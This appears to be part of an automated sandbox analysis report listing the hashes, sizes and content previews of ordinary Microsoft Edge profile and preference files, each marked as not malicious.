                                                                                                                                                                                                        Preview:7....-............_...`4~.M............._...`@./y./............c....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):232
                                                                                                                                                                                                        Entropy (8bit):5.153807895366708
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:VVXntjQPEnjQ63W/G6lhs6lXkkf5WPtKOCG+UI5WPtKOCD+MZ4NyN1FMZ4N1Fk:/XntM+t2GUT4K7t4KU3NSF3N1e
                                                                                                                                                                                                        MD5:DF9F17362577EF2F95E6414A506E4079
                                                                                                                                                                                                        SHA1:74AAD77B3E2615D510951DED18615B24A111513E
                                                                                                                                                                                                        SHA-256:FE781BAFB4F4AAC4245C39694ABA698AB4A659C1F8446F1C93CD518A0B5F9945
                                                                                                                                                                                                        SHA-512:86B9311EA1F25F79E71159356F9E4BCD81DF53CDE59CFB7AAEA7AB4B6CE7E13BAA1127AD5DBFDA8A71FE943A275486F95B8AD6F6AAA81D4C9BE81AB5A442AE35
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:A..r.................20_1_1...1.,U.................20_1_1...1.CO..................4_IPH_LiveCaption...IPH_LiveCaption.....4_IPH_PasswordsAccountStorage!..IPH_PasswordsAccountStorage.....4_IPH_ProfileSwitch...IPH_ProfileSwitch...
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):321
                                                                                                                                                                                                        Entropy (8bit):5.139169966320947
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:HUz1fNj+q2PCN23oH+TcwtfrK+IFUt8YUz1fNtKJZmw+YUz1fNtK9VkwOCN23oHK:+1fN6v1Yeb23FUt8Z1fNt0/+Z1fNt05a
                                                                                                                                                                                                        MD5:E483001952222441CCE0E3685B86E922
                                                                                                                                                                                                        SHA1:4BDBF92989B53A60FB9A46618C0EC09F7A9761BA
                                                                                                                                                                                                        SHA-256:C46F6048CF150B4D21C403A8C9C5F4D892CA270DAE89D38B45505C13D39A8DA2
                                                                                                                                                                                                        SHA-512:A0E455164FE6979DC62DA7B7439FAD3CF6279503B73EA2D0871BE16DBAF5DC58452F6D160D423629BCCBD7DB5EBF0015FEB58E312B10A6AC4DE3ADF34C6A3F28
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/11/11-02:11:11.432 be8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/11-02:11:11.433 be8 Recovering log #3.2024/11/11-02:11:11.433 be8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):321
                                                                                                                                                                                                        Entropy (8bit):5.139169966320947
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:HUz1fNj+q2PCN23oH+TcwtfrK+IFUt8YUz1fNtKJZmw+YUz1fNtK9VkwOCN23oHK:+1fN6v1Yeb23FUt8Z1fNt0/+Z1fNt05a
                                                                                                                                                                                                        MD5:E483001952222441CCE0E3685B86E922
                                                                                                                                                                                                        SHA1:4BDBF92989B53A60FB9A46618C0EC09F7A9761BA
                                                                                                                                                                                                        SHA-256:C46F6048CF150B4D21C403A8C9C5F4D892CA270DAE89D38B45505C13D39A8DA2
                                                                                                                                                                                                        SHA-512:A0E455164FE6979DC62DA7B7439FAD3CF6279503B73EA2D0871BE16DBAF5DC58452F6D160D423629BCCBD7DB5EBF0015FEB58E312B10A6AC4DE3ADF34C6A3F28
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/11/11-02:11:11.432 be8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/11-02:11:11.433 be8 Recovering log #3.2024/11/11-02:11:11.433 be8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):594
                                                                                                                                                                                                        Entropy (8bit):4.003498289542068
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:G0Xtqcsqcva3mF2lHSenmF2lH+l1m8Bc3mtD4tmF2llemF2lq3m8qPmt761m9yKm:G0nYvaZyGVC43oqn624Mtxjx47vgctuW
                                                                                                                                                                                                        MD5:C984C36B7A8692B89E0EBA6BB7FB6AFC
                                                                                                                                                                                                        SHA1:DA58C8A60C0AB35A46A90F48FE0A8DAE90D277EA
                                                                                                                                                                                                        SHA-256:BB097F86663A9DE05CD5B970F9CED4CE0AC4D2ABB590A61B396B7C36EDBF498E
                                                                                                                                                                                                        SHA-512:5B83B55EE087AD3F65A328BE536BB6D314545CF4125806305D9759319693617BB453A65B6FB9D7E71270615FC92D492DC7D8933D9591C374B327246660DACBC6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:.h.6.................__global... .t...................__global... ....Q.................20_.........................20_......w...................19_.....u....................18_.........................20_...../...................20_......@C1.................19_......8lS.................18_........h.................21_.....<..[.................9_......~z..................21_.....r....................9_.....m...................__global... ....[.................__global... .t..).................3_.....B....................4_.....:.=..................3_......W2..................4_.....
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):339
                                                                                                                                                                                                        Entropy (8bit):5.13046588315518
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:HUz1fN7+q2PCN23oH+TcwtfrzAdIFUt8YUz1fN5Zmw+YUz1fNtVkwOCN23oH+Tc/:+1fNiv1Yeb9FUt8Z1fN5/+Z1fNT5eYe+
                                                                                                                                                                                                        MD5:213F2DA56735336420249525BC4D4106
                                                                                                                                                                                                        SHA1:9495881A06FBF9AD74F6E552D51F8C89FE07BD46
                                                                                                                                                                                                        SHA-256:3CA433A08483A95AA41F6D9ED6B2540D4F4A42043111A56AD18F26778F925233
                                                                                                                                                                                                        SHA-512:923AD7D809A9B5047B6165FF5EBA405252E1B82A083D1E9613A9706DC9808BA22AE1CA5A576FCF0D73D00B5779E0D62B73435F92DD833709AA1BA1C21F6812D7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/11/11-02:11:11.429 be8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/11-02:11:11.430 be8 Recovering log #3.2024/11/11-02:11:11.430 be8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):339
                                                                                                                                                                                                        Entropy (8bit):5.13046588315518
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:HUz1fN7+q2PCN23oH+TcwtfrzAdIFUt8YUz1fN5Zmw+YUz1fNtVkwOCN23oH+Tc/:+1fNiv1Yeb9FUt8Z1fN5/+Z1fNT5eYe+
                                                                                                                                                                                                        MD5:213F2DA56735336420249525BC4D4106
                                                                                                                                                                                                        SHA1:9495881A06FBF9AD74F6E552D51F8C89FE07BD46
                                                                                                                                                                                                        SHA-256:3CA433A08483A95AA41F6D9ED6B2540D4F4A42043111A56AD18F26778F925233
                                                                                                                                                                                                        SHA-512:923AD7D809A9B5047B6165FF5EBA405252E1B82A083D1E9613A9706DC9808BA22AE1CA5A576FCF0D73D00B5779E0D62B73435F92DD833709AA1BA1C21F6812D7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/11/11-02:11:11.429 be8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/11-02:11:11.430 be8 Recovering log #3.2024/11/11-02:11:11.430 be8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):45056
                                                                                                                                                                                                        Entropy (8bit):0.2975361124918859
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:dRdu/EiHyI+Ra82/CLFdR2vGD/SJ0Yvae5WkE8txuEyGkGTm4rkCdpWEEVVo0g8v:wx9F1IohSdesk9xXytGACtQVjmBa
                                                                                                                                                                                                        MD5:22546422BF75A4EE30E03B69D90E9DF5
                                                                                                                                                                                                        SHA1:665BF967C4CE9BC26542AFAEE4CD9438E07DE9A8
                                                                                                                                                                                                        SHA-256:F3890059F6CE7F39CB1845DD919079680959F9FBBC72060DE39C2AC7B23C0434
                                                                                                                                                                                                        SHA-512:F99679D0C48F4C79D01FAD662B8F9763214A8E4F523FBEC04F5889F948B2A5493812E17D8838DCE3059B0E578AABE918EFE65FADA1E336A274E2CFD3A21F93D2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:............$...).......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                        Entropy (8bit):0.4859886077304933
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:VZvIS9IS5e0ISSUFISSIIS6ISpyISpwIS8RISeISpISmW+ISOoIS8ZIS8lIS5Ela:VZizD4hmTdnVy
                                                                                                                                                                                                        MD5:6C25E867B515517774BB0C09FB455BD4
                                                                                                                                                                                                        SHA1:47C486FC6B2921AA8E87BFE4AC0DBB28BBF4A2D9
SHA-256:69993F0996A6FCEFC1606AFD0DDBD3EE806FA46D9A862840D5747DC3F56FAF82
SHA-512:07A51C9632C00C58A1D2002DA6896DB6C09A3FEFBCBE732BCEDF09964699075B5627D2DB053D27406FDBDE027E47DC8DE4C8E8B277FC04EEDD520312329A9B3E
Malicious:false
Preview:................*...................................................................w......7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):120
Entropy (8bit):3.32524464792714
Encrypted:false
SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
MD5:A397E5983D4A1619E36143B4D804B870
SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
Malicious:false
Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):11
Entropy (8bit):2.59490661824394
Encrypted:false
SSDEEP:3:gem3:gL3
MD5:E60DFE28E77A79CD2CAA4F53BD711995
SHA1:2A150938498D9778DAF21F87B3E52ABDD4084716
SHA-256:D5E1FB030857E079A8FD6811C81BF756D23CED9AF5DC299354C88F89B763415E
SHA-512:B2ED5D4C3EEB946C2C869988E227ACD771614D559E1C108578546AA919E74251B92C7A1241D5E113018AB20A4295BBBCC12B7C520FB1C13DB242EC1B02B74F43
Malicious:false
Preview:94.0.992.31

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):14969
Entropy (8bit):5.625902218243038
Encrypted:false
SSDEEP:384:U9iIuERzA83h09RZxeIKrb8y9eIKf+qNrB:/IuERzA83h09RZxub8y9eIKfHNd
MD5:7B169E6533A1190C9D60A7D6DC985A4F
SHA1:FCC541D7DF586A46A6D31E6E08021E58E2A8A710
SHA-256:C65C4D3896A140BC82CDB49A2E3FB1EBECF2373C53D20F82AD195A52E4C5309E
SHA-512:33BC784CE3FD81A545F6D5FD4AC2E1388ADE4FFEBD4955086F95026D248D0AEECE7E95A4942D50FF4EC85281B7517B56EC5D3CE8A853F2A5E13EAD94F14727F4
Malicious:false
Preview:{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):14969
Entropy (8bit):5.625902218243038
Encrypted:false
SSDEEP:384:U9iIuERzA83h09RZxeIKrb8y9eIKf+qNrB:/IuERzA83h09RZxub8y9eIKfHNd
MD5:7B169E6533A1190C9D60A7D6DC985A4F
SHA1:FCC541D7DF586A46A6D31E6E08021E58E2A8A710
SHA-256:C65C4D3896A140BC82CDB49A2E3FB1EBECF2373C53D20F82AD195A52E4C5309E
SHA-512:33BC784CE3FD81A545F6D5FD4AC2E1388ADE4FFEBD4955086F95026D248D0AEECE7E95A4942D50FF4EC85281B7517B56EC5D3CE8A853F2A5E13EAD94F14727F4
Malicious:false
Preview:{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):14969
Entropy (8bit):5.625902218243038
Encrypted:false
SSDEEP:384:U9iIuERzA83h09RZxeIKrb8y9eIKf+qNrB:/IuERzA83h09RZxub8y9eIKfHNd
MD5:7B169E6533A1190C9D60A7D6DC985A4F
SHA1:FCC541D7DF586A46A6D31E6E08021E58E2A8A710
SHA-256:C65C4D3896A140BC82CDB49A2E3FB1EBECF2373C53D20F82AD195A52E4C5309E
SHA-512:33BC784CE3FD81A545F6D5FD4AC2E1388ADE4FFEBD4955086F95026D248D0AEECE7E95A4942D50FF4EC85281B7517B56EC5D3CE8A853F2A5E13EAD94F14727F4
Malicious:false
Preview:{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):14969
Entropy (8bit):5.625902218243038
Encrypted:false
SSDEEP:384:U9iIuERzA83h09RZxeIKrb8y9eIKf+qNrB:/IuERzA83h09RZxub8y9eIKfHNd
MD5:7B169E6533A1190C9D60A7D6DC985A4F
SHA1:FCC541D7DF586A46A6D31E6E08021E58E2A8A710
SHA-256:C65C4D3896A140BC82CDB49A2E3FB1EBECF2373C53D20F82AD195A52E4C5309E
SHA-512:33BC784CE3FD81A545F6D5FD4AC2E1388ADE4FFEBD4955086F95026D248D0AEECE7E95A4942D50FF4EC85281B7517B56EC5D3CE8A853F2A5E13EAD94F14727F4
Malicious:false
Preview:{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):270336
Entropy (8bit):0.0012471779557650352
Encrypted:false
SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:F50F89A0A91564D0B8A211F8921AA7DE
SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:false
Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):40
Entropy (8bit):4.346439344671015
Encrypted:false
SSDEEP:3:kfKbUPVXXMVQX:kygV5
MD5:6A3A60A3F78299444AACAA89710A64B6
SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
Malicious:false
Preview:synchronousLookupUris_638343870221005468

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):57
Entropy (8bit):4.556488479039065
Encrypted:false
SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
MD5:3A05EAEA94307F8C57BAC69C3DF64E59
SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
Malicious:false
Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16220
                                                                                                                                                                                                        Entropy (8bit):5.7880850797217
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:Y9iIxuERzA83h09RZxJIPaK8y9b6cZGVKf+qNpuB:DIxuERzA83h09RZxBK8y9b9EKfHNp2
                                                                                                                                                                                                        MD5:D5A0338AA9C7EF2B80106106DF8992F5
                                                                                                                                                                                                        SHA1:F0654AEA0E37BF8478D00DC822EBCB7A84786729
                                                                                                                                                                                                        SHA-256:929336DFBB0EBDE117CC0760BC455A996F7B185E2B59FFB24E8B31DAB7636007
                                                                                                                                                                                                        SHA-512:EEF201A0C823956F6CC33E5743D5E9D1D3E45DA27B1A04BE911AE95837427B16E688243BAD1E5C254DC32AF11A5FEFD61AE7268E53E4479A93717CD37E34A7F8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_polic
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                        Size (bytes):4
                                                                                                                                                                                                        Entropy (8bit):1.5
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Zn:Z
                                                                                                                                                                                                        MD5:20807E605DF9113DB80F9F147B0A14A9
                                                                                                                                                                                                        SHA1:DE36A513DA2B090153819B713FBAF7CD5EB41DB3
                                                                                                                                                                                                        SHA-256:A04A71C66CD0BD011D77F88982931FFCDD818DF124FF6A5AB60FE00E81E6C5F2
                                                                                                                                                                                                        SHA-512:366920A2E345E8D8A382F0B152B4C8A93B1BFD7033EEC21133E86438DD3A153227985081D3CCFA7BF24A1CBB27A688E92DF6BCF9B24EE0BFC63612E65741FB6C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:446.
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16220
                                                                                                                                                                                                        Entropy (8bit):5.788004787573794
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:Y9iIxuERzA83h09RZxJIPaN8y9b6cZGVKf+qNpuB:DIxuERzA83h09RZxBN8y9b9EKfHNp2
                                                                                                                                                                                                        MD5:13A92747C93F01C834DDC302207BDF68
                                                                                                                                                                                                        SHA1:3F0A6FA7E54190BFA2EA5C0E389CA46D12DC8767
                                                                                                                                                                                                        SHA-256:5A9C425ECAF11DDAC15F5F3CCE7A81FBD59267B18C7E68AB02CB01F1D1EBAC42
                                                                                                                                                                                                        SHA-512:6B8BFBDC3DD7229F3B1FFC407B3903DC01310915583A73C16608870D2200D9ECBEB90FB26F767FBD5193FE2409AFF5E88B050171F2595F63D4079BEF23C0D679
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_polic
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2278
                                                                                                                                                                                                        Entropy (8bit):3.841134013249316
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:uiTrlKxrgx6Uxl9Il8uaqaM9JLCxsVI0ynSdY+Vzd1rc:mXoY3aOJLCirJe+VU
                                                                                                                                                                                                        MD5:E154882CCFCBA08B62EF88263372C333
                                                                                                                                                                                                        SHA1:A83DC2B492A2F9FD673AA1AF88BA9896D328DD34
                                                                                                                                                                                                        SHA-256:477E984AA5A92E4B4378DABA6CB102A1DAF9D59EB171FDA2DD89C058CEC68389
                                                                                                                                                                                                        SHA-512:1CFB36A07D2B69EB362E789B52EE4AA23DE9F3C229183E038614068DC34E9DBDD318250EE32790A7D0835B696E1359ADD9B3B7F449E1B1A6DA124B44007FD9C3
                                                                                                                                                                                                        Malicious:false
